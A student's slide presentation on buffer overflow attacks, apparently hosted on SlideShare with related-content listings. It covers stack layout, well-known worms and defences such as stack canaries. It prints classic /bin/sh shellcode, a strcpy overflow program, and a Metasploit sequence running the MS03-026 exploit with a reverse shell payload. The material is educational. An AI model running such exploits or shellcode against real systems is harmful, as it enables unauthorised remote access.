Kapil Nagrale, profile picture
Uploaded byKapil Nagrale
PPTX, PDF3,759 views

Buffer overflow attacks

This document discusses buffer overflow attacks. It begins with an introduction that defines a buffer overflow and examples like the Morris worm. It then explains how buffer overflows work by corrupting the stack and overwriting return addresses. Methods for implementing buffer overflows using Metasploit and injecting shellcode are provided. Countermeasures like stack canaries and bounds checking are described. The document concludes that while defenses have improved, legacy systems remain vulnerable and buffer overflows remain a problem.

Embed presentation

Downloaded 199 times
BUFFER OVERFLOW ATTACKS Submitted By : Kapil Nagrale M.tech FY Software Engineering Roll No : 132190015
OUTLINE        INTRODUCTION STACK BASIS HOW IT WORKS ? IMPLEMENTING WITH METASPLOIT COUNTERMEASURES CONCLUSION REFERENCES
INTRODUCTION  What is buffer overflow? More data is put into a holding area than it can handle. Cause: Lack of bound checking (eg: standard C library )  An Intrusion or a Successful Attack aims to change the flow of control ( using buffer overflow), letting the attacker execute arbitrary code
INTRODUCTION  Morris worm (November 1988) Used finger Daemon to overflow buffer  Code Red worm (July 2001)  Slammer Worm (Jan 2003) Exploits the vulnerability in Microsoft SQL Server 2000
STACK BASICS Lower Memory Addresses Local Variables Old Base Pointer Return Address Higher Memory Address Arguments
HOW IT WORKS? void main() { int x; x = 0; function(1,2,3); x = 1; void function( int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; printf( "%dn",x); } ret = buffer1 + 12; (*ret) += 8; } This function jumps over the x=1 assignment directly to the printf() and prints the value as 0. The offsets (12, 8 used above ) are machine-dependant.
CONTINUED What do you do after overflowing the buffer?  Inject some code into the victim. Make the function return to this code  Spawning a shell  void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }  Dump the executable of the above execve() command and store it in a buffer
char shellcode[] = "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; // Fill the large_string Array with the address of the buffer // (shell code) for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; // Copy shell code to the beginning of large_string for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; // Copy large_string onto buffer. This overflows the return address // and execs a shell strcpy(buffer,large_string); }
In a real security attack, malicious code usually comes form  environment variable  user input  network connection List of unsafe functions in the standard C library  strcpy()  strcat()  getwd()  gets()  fscanf()  scanf()  sprintf()
IMPLEMENTING WITH METASPLOIT  What is Metasploit? The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing .
TERMINOLOGIES  Exploit : Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access).  Payload : A payload is the program or code that is delivered to the victim system.  Session : Connection from successful exploit  LHOST : LOCAL HOST  RHOST : REMOTE HOST
IMPLEMENTATION          msf > use exploit/windows/dcerpc/ms03_026_dcom msf > show options msf > set RHOST 10.0.0.3 msf >show payloads msf >set PAYLOAD generic/shell_reverse_tcp msf >set LHOST 10.0.0.6 msf > exploit sessions –i 1 It will give a comman shell of victim’s computer on msfconsole. If the vulnerable program has root privileges one can have complete access to system.
COUNTERMEASURES  Array Bounds Checking While injecting code is optional for a buffer overflow attack, the corruption of control flow is essential. Thus unlike non-executable buffers, array bounds checking completely stops buffer overflow vulnerabilities and attacks. If arrays cannot be overflowed at all, then array overflows cannot be used to corrupt adjacent program state.
STACK GUARD METHOD DETECTING RETURN ADDRESS CHANGE: CANARY Place a Canary word before the return Address When the function returns, it first checks to see that the “CANARY WORD” is intact before jumping to the address pointed to by the return address
STACK SHIELD  Global Ret Stack Whenever a function call is made, the return address being pushed onto the normal stack is at the same time copied into the Global Ret Stack array. The Global Ret Stack has by default 256 entries, which limits the nesting depth to 256 function calls  RET Range Check It uses a global variable to store the return address of the current function.  Protecting Function Pointers Add checking code before all function calls that make use of function pointers to make sure that the function pointer does not point to parts of memory other than text segment.
CONCLUSION  The best available tool is effective against only 50% of the attacks. Often these tools incur undesirable performance overheads.  Even if we start writing the best of code from this point of time, there is still millions of code lines of “Legacy Code” out there which is vulnerable.  StackGuard is a systematic compiler tool that prevents a broad class of buffer overflow security attacks from succeeding.
REFERENCES  Conference on Software Security : Aleph One, Smashing the Stack for Fun and Profit. Originally published in Phrack 4914.1996  IEEE Reference : Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade*  The 7th International Conference on Computer Science & Education (ICCSE 2012)The Principle and Prevention of Windows Buffer Overflow  Pincus, Jonathan,”Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns”, IEEE Security&Privacy
Q&A

More Related Content

PDF
Web Security
byDr.Florence Dayana
 
PPTX
Buffer overflow attacks
byJoe McCarthy
 
PPTX
Buffer overflow
byEvgeni Tsonev
 
PPT
6 buffer overflows
bydrewz lin
 
PPTX
Operating system security
byRamesh Ogania
 
PPTX
Buffer overflow
byقصي نسور
 
PPTX
Elgamal digital signature
byMDKAWSARAHMEDSAGAR
 
PPTX
Key management and distribution
byRiya Choudhary
 
Web Security
byDr.Florence Dayana
 
Buffer overflow attacks
byJoe McCarthy
 
Buffer overflow
byEvgeni Tsonev
 
6 buffer overflows
bydrewz lin
 
Operating system security
byRamesh Ogania
 
Buffer overflow
byقصي نسور
 
Elgamal digital signature
byMDKAWSARAHMEDSAGAR
 
Key management and distribution
byRiya Choudhary
 

What's hot

PPTX
Cryptography-Known plain text attack
byamiteshg
 
PPT
Network security cryptographic hash function
byMijanur Rahman Milon
 
PDF
Cs8792 cns - unit iv
byArthyR3
 
PPTX
Symmetric and asymmetric key cryptography
byMONIRUL ISLAM
 
PDF
Using Machine Learning in Networks Intrusion Detection Systems
byOmar Shaya
 
PDF
Introduction to Cryptography
bySeema Goel
 
PPTX
Diffie Hellman Key Exchange
bySAURABHDHAGE6
 
PPTX
Double DES & Triple DES
byHemant Sharma
 
PPTX
El Gamal Cryptosystem
byAdri Jovin
 
PPTX
Computer architecture virtual memory
byMazin Alwaaly
 
PPT
Security Attacks.ppt
byZaheer720515
 
PPTX
Hash Function
bySiddharth Srivastava
 
PPTX
Network attacks
byManjushree Mashal
 
PPTX
Metasploit
byhenelpj
 
PPTX
Trible data encryption standard (3DES)
byAhmed Mohamed Mahmoud
 
PPTX
Network security - Defense in Depth
byDilum Bandara
 
PPSX
Exception Handling
byReddhi Basu
 
PPT
Firewalls & Trusted Systems by Ashok Panwar
byAshok Panwar
 
PPTX
Cryptanalysis
bySou Jana
 
PPT
Pretty good privacy
byPushkar Dutt
 
Cryptography-Known plain text attack
byamiteshg
 
Network security cryptographic hash function
byMijanur Rahman Milon
 
Cs8792 cns - unit iv
byArthyR3
 
Symmetric and asymmetric key cryptography
byMONIRUL ISLAM
 
Using Machine Learning in Networks Intrusion Detection Systems
byOmar Shaya
 
Introduction to Cryptography
bySeema Goel
 
Diffie Hellman Key Exchange
bySAURABHDHAGE6
 
Double DES & Triple DES
byHemant Sharma
 
El Gamal Cryptosystem
byAdri Jovin
 
Computer architecture virtual memory
byMazin Alwaaly
 
Security Attacks.ppt
byZaheer720515
 
Hash Function
bySiddharth Srivastava
 
Network attacks
byManjushree Mashal
 
Metasploit
byhenelpj
 
Trible data encryption standard (3DES)
byAhmed Mohamed Mahmoud
 
Network security - Defense in Depth
byDilum Bandara
 
Exception Handling
byReddhi Basu
 
Firewalls & Trusted Systems by Ashok Panwar
byAshok Panwar
 
Cryptanalysis
bySou Jana
 
Pretty good privacy
byPushkar Dutt
 

Similar to Buffer overflow attacks

PPTX
antoanthongtin_Lesson 3- Software Security (1).pptx
by23162024
 
PPTX
Control hijacking
byPrachi Gulihar
 
PDF
Buffer Overflows in cybersecurity notes .pdf
byavinashspider018
 
DOCX
1Buttercup On Network-based Detection of Polymorphic B.docx
byaryan532920
 
PDF
IRJET - Buffer Overflows Attacks & Defense
byIRJET Journal
 
PDF
Buffer Overflow- Secure-Development- Lecture-9.pdf
byHammadAli989482
 
PPTX
Buffer overflow attack
byKrish
 
PPTX
fjfh mjgkj jkhglkjh jhlkh lhlkkhl kjhjkhjk
byahmed8790
 
PPSX
Ids 008 buffer overflow
byjyoti_lakhani
 
PPT
Dau Hoang - Buffer Overflows 8980 for Stu
byQueenNicki1
 
PPTX
Buffer overflows
bySandun Perera
 
PPTX
Golf teamlearnerlecture
bykairistiona
 
PPT
Ch03-bufferOverFlow-attack-Ch03-bufferOverFlow-attack.ppt.ppt
byDavid Vera Olivera, PMP®, ITIL, SCM®
 
PPTX
Stack-Based Buffer Overflows
byDaniel Tumser
 
PPT
Buffer Overflows
bySumit Kumar
 
PDF
Software Security
byRoman Oliynykov
 
PPT
Buffer Overflow Attacks
byharshal kshatriya
 
PPTX
Buffer overflow
byAbu Juha Ahmed Muid
 
PDF
Unix executable buffer overflow
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
DOCX
What
byanity
 
antoanthongtin_Lesson 3- Software Security (1).pptx
by23162024
 
Control hijacking
byPrachi Gulihar
 
Buffer Overflows in cybersecurity notes .pdf
byavinashspider018
 
1Buttercup On Network-based Detection of Polymorphic B.docx
byaryan532920
 
IRJET - Buffer Overflows Attacks & Defense
byIRJET Journal
 
Buffer Overflow- Secure-Development- Lecture-9.pdf
byHammadAli989482
 
Buffer overflow attack
byKrish
 
fjfh mjgkj jkhglkjh jhlkh lhlkkhl kjhjkhjk
byahmed8790
 
Ids 008 buffer overflow
byjyoti_lakhani
 
Dau Hoang - Buffer Overflows 8980 for Stu
byQueenNicki1
 
Buffer overflows
bySandun Perera
 
Golf teamlearnerlecture
bykairistiona
 
Ch03-bufferOverFlow-attack-Ch03-bufferOverFlow-attack.ppt.ppt
byDavid Vera Olivera, PMP®, ITIL, SCM®
 
Stack-Based Buffer Overflows
byDaniel Tumser
 
Buffer Overflows
bySumit Kumar
 
Software Security
byRoman Oliynykov
 
Buffer Overflow Attacks
byharshal kshatriya
 
Buffer overflow
byAbu Juha Ahmed Muid
 
Unix executable buffer overflow
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
What
byanity
 

Recently uploaded

PDF
BP801T BIOSTATISITCS AND RESEARCH METHODOLOGY (Theory) Unit 2 Part 1
byRushi Mandali
 
PPTX
How to Set Recurring Tasks in Odoo Projects
byCeline George
 
PDF
The Sheep and the Goat: Beckett’s Subversion of Divine Justice in Waiting for...
bysejadchokiya
 
PPTX
ELIMINATION NEEDS Fundamentals of Nursing .pptx
bySonali Gupta
 
PPTX
Overview of How to set priority in Odoo 19 Todo
byCeline George
 
PPTX
Greengnorance Toolkit Module 2 Energy saving
byKarl Donert
 
PDF
Power, Propaganda, and Fear: A Study of W. H. Auden’s Epitaph on a Tyrant
bypriyarathod315
 
PDF
"Perfection of a Kind": A New Critical Reading of W.H. Auden’s Epitaph on a T...
byKruti Vyas
 
PPTX
Methods & Applications of Enzyme Immobilization Technique.pptx
byAnupkumar Sharma
 
PPTX
Simulation Learning in Health Sciences and Human Service programs at Camosun ...
bygabitouss
 
PDF
BP502T Industrial Pharmacy I (Theory) UNIT– I (Part 1)
byRushi Mandali
 
PPTX
How to perform product search based on a custom field from the Website Shop p...
byCeline George
 
PDF
Intellectual Property Rights III Types (IPR)
byAmit Gangwal
 
PPTX
Greengnorance Toolkit Module 3 Shopping and Food
byKarl Donert
 
PPTX
Plant fibres used as surgical dressings & Sutures – Surgical Catgut and Ligat...
bySai Meer College of Pharmacy
 
PPTX
Surface tension is the force acting per unit lenth of thec surface
bysavithakps95
 
PDF
BP809ET COSMETIC SCIENCE (Theory) Unit 1
byRushi Mandali
 
PPTX
PRE TERM LABOR ( PREMATURE LABOUR IN PREGNANCY)
byMuthu Kumar
 
PDF
Art, Memory, and Modernity: A Study of W. H. Auden’s In Memory of W. B. Yeats
bypriyarathod315
 
PPTX
Renal Physiology- Functional anatomy of Kidney.pptx
byDisha Soriya
 
BP801T BIOSTATISITCS AND RESEARCH METHODOLOGY (Theory) Unit 2 Part 1
byRushi Mandali
 
How to Set Recurring Tasks in Odoo Projects
byCeline George
 
The Sheep and the Goat: Beckett’s Subversion of Divine Justice in Waiting for...
bysejadchokiya
 
ELIMINATION NEEDS Fundamentals of Nursing .pptx
bySonali Gupta
 
Overview of How to set priority in Odoo 19 Todo
byCeline George
 
Greengnorance Toolkit Module 2 Energy saving
byKarl Donert
 
Power, Propaganda, and Fear: A Study of W. H. Auden’s Epitaph on a Tyrant
bypriyarathod315
 
"Perfection of a Kind": A New Critical Reading of W.H. Auden’s Epitaph on a T...
byKruti Vyas
 
Methods & Applications of Enzyme Immobilization Technique.pptx
byAnupkumar Sharma
 
Simulation Learning in Health Sciences and Human Service programs at Camosun ...
bygabitouss
 
BP502T Industrial Pharmacy I (Theory) UNIT– I (Part 1)
byRushi Mandali
 
How to perform product search based on a custom field from the Website Shop p...
byCeline George
 
Intellectual Property Rights III Types (IPR)
byAmit Gangwal
 
Greengnorance Toolkit Module 3 Shopping and Food
byKarl Donert
 
Plant fibres used as surgical dressings & Sutures – Surgical Catgut and Ligat...
bySai Meer College of Pharmacy
 
Surface tension is the force acting per unit lenth of thec surface
bysavithakps95
 
BP809ET COSMETIC SCIENCE (Theory) Unit 1
byRushi Mandali
 
PRE TERM LABOR ( PREMATURE LABOUR IN PREGNANCY)
byMuthu Kumar
 
Art, Memory, and Modernity: A Study of W. H. Auden’s In Memory of W. B. Yeats
bypriyarathod315
 
Renal Physiology- Functional anatomy of Kidney.pptx
byDisha Soriya
 

Buffer overflow attacks

  • 1.
    BUFFER OVERFLOW ATTACKS SubmittedBy : Kapil Nagrale M.tech FY Software Engineering Roll No : 132190015
  • 2.
    OUTLINE        INTRODUCTION STACK BASIS HOW ITWORKS ? IMPLEMENTING WITH METASPLOIT COUNTERMEASURES CONCLUSION REFERENCES
  • 3.
    INTRODUCTION  What is bufferoverflow? More data is put into a holding area than it can handle. Cause: Lack of bound checking (eg: standard C library )  An Intrusion or a Successful Attack aims to change the flow of control ( using buffer overflow), letting the attacker execute arbitrary code
  • 4.
    INTRODUCTION  Morris worm (November1988) Used finger Daemon to overflow buffer  Code Red worm (July 2001)  Slammer Worm (Jan 2003) Exploits the vulnerability in Microsoft SQL Server 2000
  • 5.
    STACK BASICS Lower MemoryAddresses Local Variables Old Base Pointer Return Address Higher Memory Address Arguments
  • 6.
    HOW IT WORKS? voidmain() { int x; x = 0; function(1,2,3); x = 1; void function( int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; printf( "%dn",x); } ret = buffer1 + 12; (*ret) += 8; } This function jumps over the x=1 assignment directly to the printf() and prints the value as 0. The offsets (12, 8 used above ) are machine-dependant.
  • 7.
    CONTINUED What do youdo after overflowing the buffer?  Inject some code into the victim. Make the function return to this code  Spawning a shell  void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }  Dump the executable of the above execve() command and store it in a buffer
  • 8.
    char shellcode[] = "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; charlarge_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; // Fill the large_string Array with the address of the buffer // (shell code) for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; // Copy shell code to the beginning of large_string for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; // Copy large_string onto buffer. This overflows the return address // and execs a shell strcpy(buffer,large_string); }
  • 9.
    In a realsecurity attack, malicious code usually comes form  environment variable  user input  network connection List of unsafe functions in the standard C library  strcpy()  strcat()  getwd()  gets()  fscanf()  scanf()  sprintf()
  • 10.
    IMPLEMENTING WITH METASPLOIT  Whatis Metasploit? The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing .
  • 11.
    TERMINOLOGIES  Exploit : Exploitis the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access).  Payload : A payload is the program or code that is delivered to the victim system.  Session : Connection from successful exploit  LHOST : LOCAL HOST  RHOST : REMOTE HOST
  • 12.
    IMPLEMENTATION          msf > useexploit/windows/dcerpc/ms03_026_dcom msf > show options msf > set RHOST 10.0.0.3 msf >show payloads msf >set PAYLOAD generic/shell_reverse_tcp msf >set LHOST 10.0.0.6 msf > exploit sessions –i 1 It will give a comman shell of victim’s computer on msfconsole. If the vulnerable program has root privileges one can have complete access to system.
  • 13.
    COUNTERMEASURES  Array Bounds Checking Whileinjecting code is optional for a buffer overflow attack, the corruption of control flow is essential. Thus unlike non-executable buffers, array bounds checking completely stops buffer overflow vulnerabilities and attacks. If arrays cannot be overflowed at all, then array overflows cannot be used to corrupt adjacent program state.
  • 14.
    STACK GUARD METHOD DETECTINGRETURN ADDRESS CHANGE: CANARY Place a Canary word before the return Address When the function returns, it first checks to see that the “CANARY WORD” is intact before jumping to the address pointed to by the return address
  • 15.
    STACK SHIELD  Global RetStack Whenever a function call is made, the return address being pushed onto the normal stack is at the same time copied into the Global Ret Stack array. The Global Ret Stack has by default 256 entries, which limits the nesting depth to 256 function calls  RET Range Check It uses a global variable to store the return address of the current function.  Protecting Function Pointers Add checking code before all function calls that make use of function pointers to make sure that the function pointer does not point to parts of memory other than text segment.
  • 16.
    CONCLUSION  The best availabletool is effective against only 50% of the attacks. Often these tools incur undesirable performance overheads.  Even if we start writing the best of code from this point of time, there is still millions of code lines of “Legacy Code” out there which is vulnerable.  StackGuard is a systematic compiler tool that prevents a broad class of buffer overflow security attacks from succeeding.
  • 17.
    REFERENCES  Conference on SoftwareSecurity : Aleph One, Smashing the Stack for Fun and Profit. Originally published in Phrack 4914.1996  IEEE Reference : Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade*  The 7th International Conference on Computer Science & Education (ICCSE 2012)The Principle and Prevention of Windows Buffer Overflow  Pincus, Jonathan,”Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns”, IEEE Security&Privacy
  • 18.